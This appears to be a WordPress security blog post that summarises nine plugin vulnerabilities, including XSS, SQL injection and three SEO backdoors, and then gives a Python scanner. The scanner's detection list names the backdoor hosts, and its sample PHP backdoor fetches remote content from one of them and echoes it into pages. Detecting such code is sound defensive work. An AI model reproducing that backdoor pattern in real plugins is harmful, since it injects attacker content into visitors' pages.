
WP Security: 9 plugin vulnerabilities in December


For your WP Security, be informed about the latest vulnerabilities in WordPress plugins:

  1. WP Mailster
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
      • Update immediately to version 1.5.5, which fixes the vulnerability.
  2. Smart Marketing SMS and Newsletters Forms
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. WordPress Smart Marketing SMS and Newsletters Forms plugin version 1.1.1 suffers from a persistent cross-site scripting vulnerability.
      • NO update has been provided by the developer to fix this vulnerability. Remove the plugin immediately.
  3. AccessPress Anonymous Post Pro
    • SQL Injection reported by Dewhurst Security. Improper sanitization allows an attacker to override the settings for allowed file extensions and maximum upload file size, so the attacker can upload anything they want, bypassing the filters.
      • Update immediately to version 3.2.0, which fixes the vulnerability.
  4. Content Cards
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. Cross-site scripting (XSS) vulnerability in the Content Cards plugin before 0.9.7 for WordPress allows remote attackers to inject arbitrary JavaScript via crafted OpenGraph data.
      • Update immediately to version 0.9.7, which fixes the vulnerability.
  5. Custom Map
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. A cross-site scripting (XSS) vulnerability in the custom-map plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map_id parameter to view/advancedsettings.php.
      • This plugin was closed on December 21, 2017 and is no longer available for download.
  6. WordPress Concours
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. A cross-site scripting (XSS) vulnerability in the wp-concours plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the result_message parameter to includes/concours_page.php.
      • This plugin was closed on December 21, 2017 and is no longer available for download.
  7. Duplicate Page and Post
    • Backdoor reported by erwanlr (twitter.com/erwan_lr). The backdoor makes a request to cloud-wp.org and will return content based on the URL and user agent passed in the query string. This code runs on every request to the site, so it can be used to inject content to normal site visitors, web crawlers, or the site administrators.
      • This plugin was closed on December 14, 2017 and is no longer available for download.
  8. No Follow All External Links
    • Backdoor reported by erwanlr (twitter.com/erwan_lr). The backdoor makes a request to cloud.wpserve.org and returns content based on the URL and user agent passed in the query string. Content injection looks to be bound to a setting in the plugin called “Improvement scheme” which is enabled by default. Disabling the setting doesn’t actually turn off the injection since the code in the if statement is setting the value instead of comparing it to 1. The code verifies that the user agent matches a web crawler (like Googlebot), so it looks like this backdoor is used for SEO by injecting backlinks onto the page.
      • This plugin was closed on December 19, 2017 and is no longer available for download.
  9. WP No External Links
    • Backdoor reported by erwanlr (twitter.com/erwan_lr). In the same manner as the previous two backdoors, this one makes a request to wpconnect.org and returns content based on the URL and user agent passed in the query string. The code verifies that the user agent matches a web crawler, so, again, it looks like this backdoor is used for SEO by injecting backlinks onto the page. Wpconnect.org resolves to the same IP as cloud-wp.org, 52.14.28.183, the API endpoint used in the Duplicate Page and Post backdoor.
      • This plugin has been closed for new installs.
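As an added example (not code from the advisories or from any of the plugins named), the following Python script turns the traits described in items 7 to 9 into static checks you can run over a site's plugin files: the endpoints named above, a crawler-gated remote fetch whose body is echoed into the page, and the assignment-inside-if bug that left the "Improvement scheme" toggle ineffective. The regexes and the sample PHP are constructed heuristics modelled on the descriptions, not the plugins' real code, so expect to tune them on a real code base.

```python
import re
from pathlib import Path

# Endpoints named in the three backdoor reports above (values taken from the advisory text).
BACKDOOR_HOSTS = ("cloud-wp.org", "cloud.wpserve.org", "wpconnect.org", "52.14.28.183")

# Heuristics: a remote fetch, a crawler check near the user agent, and output of the body.
REMOTE_FETCH = re.compile(r"\b(?:wp_remote_get|file_get_contents|curl_exec)\s*\(")
UA_GATE = re.compile(r"HTTP_USER_AGENT[\s\S]{0,400}?(?:googlebot|bingbot|crawler|spider)", re.I)
ECHOED = re.compile(r"\b(?:echo|print)\b")
# `if ($opt = 1)`: an assignment where a comparison (==, ===, !=, <=, >=) was meant.
ASSIGN_IN_IF = re.compile(r"\bif\s*\(\s*\$\w+(?:\[[^\]]*\])?\s*=(?!=)")

def scan_source(src: str) -> dict:
    """Return the traits found in one PHP source string; an empty dict means none."""
    findings = {}
    hosts = [h for h in BACKDOOR_HOSTS if h in src]
    if hosts:
        findings["known_backdoor_host"] = hosts
    if REMOTE_FETCH.search(src) and UA_GATE.search(src) and ECHOED.search(src):
        findings["crawler_gated_remote_injection"] = True
    m = ASSIGN_IN_IF.search(src)
    if m:
        findings["assignment_in_if"] = src.count("\n", 0, m.start()) + 1  # 1-based line
    return findings

def scan_plugin_dir(root: str) -> dict:
    """Map each .php file under a plugins directory to its non-empty findings."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(errors="ignore"))
        if found:
            report[str(path)] = found
    return report

# Constructed sample modelled on the description of item 8; not the plugin's real code.
SAMPLE_BACKDOOR = r"""<?php
$opt = get_option('improvement_scheme');
if ($opt = 1) {  // assignment, so this branch runs however the option is set
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/Googlebot|bingbot/i', $ua)) {
        echo wp_remote_retrieve_body(wp_remote_get('http://cloud.wpserve.org/?u=' . $_SERVER['REQUEST_URI'] . '&ua=' . $ua));
    }
}
"""

if __name__ == "__main__":
    print(scan_source(SAMPLE_BACKDOOR))  # expect all three traits, assignment_in_if on line 3
```

Run `scan_plugin_dir("wp-content/plugins")` from the WordPress root to get a per-file report; an empty report means none of the three traits were seen, not that the plugins are clean.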

Protect your WordPress: BEFORE IT'S TOO LATE! You will also protect your customers, your reputation and your online business!
